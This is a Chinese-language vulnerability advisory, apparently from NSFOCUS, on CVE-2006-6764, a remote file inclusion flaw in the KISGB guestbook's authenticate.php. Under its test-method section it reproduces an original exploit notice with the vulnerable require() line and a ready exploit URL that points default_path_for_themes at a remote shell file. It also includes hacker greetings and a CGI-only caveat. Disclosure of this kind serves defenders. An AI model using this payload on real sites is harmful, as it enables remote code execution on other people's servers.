首页 -> 安全研究

安全研究

安全漏洞
KISGB default_path_for_themes参数文件包含漏洞

发布日期:2006-12-26
更新日期:2006-12-27

受影响系统:
KISGB KISGB 5.x
描述:
CVE(CAN) ID: CVE-2006-6764

KISGB(Keep It Simple Guest Book)是一款高级的PHP留言簿程序。

KISGB在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。

KISGB的authenticate.php脚本没有正确地验证default_path_for_themes参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意代码。

<*来源:mdx (bilkopat@hotmail.com
  
  链接:http://secunia.com/advisories/23477/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

******************************************************************************************************
*KISGB (Keep It Simple Guest Book)* [default_path_for_themes] ******************* Remote File Include*
******************************************************************************************************
*******************************************
+class : Remote File Include Vulnerability*
+******************************************************************************************************************
+download link : http://phpnuke-downloads.com/modules.php?name=Downloads&d_op=ns_getit&cid=14&lid=156&type=url#get*
*******************************************************************************************************************
+Author : mdx
*
*****************************************************************************
+Files :                                    *
+authenticate.php?                                                          *
**********************************************************************************
+code  :                                                                         *
+                                                                                *
+if (isset($default_path_for_themes)) require("$default_path_for_themes/$theme");*
+                                                                                *
*********************************************************************************************
+ Exploit  :                                                                                *
+********************************************************************************************+
+ http://www.site.***/[path]/authenticate.php?default_path_for_themes=http://mdxshell.txt?   +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
==============================================================================================
?                  Hi , The_bat_hacker , How are you ? ;=)                                   *
?                                                                                            *
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , ozii , sakkure , abbad, dreamlord*
?                                                                                            *
?/////////////////////////////////////////////////////////////////////////////////////////////
?---------------------specials thanks  stroke ,SHiKaA----------------------------------------*
**********************************************************************************************
*******************                                                                          *
*******************                   KORKULARINIZ SADECE KABUSLARINIZDIR..             *
*******************                                                                          *
*******************                        Turkish Hacker by mdx                             *
*******************                                                                          *
*******************                        Korkmak Kurtulmak Degildir.                 *
*******************                                                                          *
**********************************************************************************************


//////////////////////////////////////////////////////////////////////////////////////////////


Notes:

$sapi_name = strtolower(php_sapi_name());
if (strpos($sapi_name,"cgi")===FALSE) {
}
else {
    Vulnerable here.
    
So this is only vulnerable for CGI PHP versions.

/str0ke

建议:
厂商补丁:

KISGB
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://sourceforge.net/projects/kisgb

浏览次数:3106
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障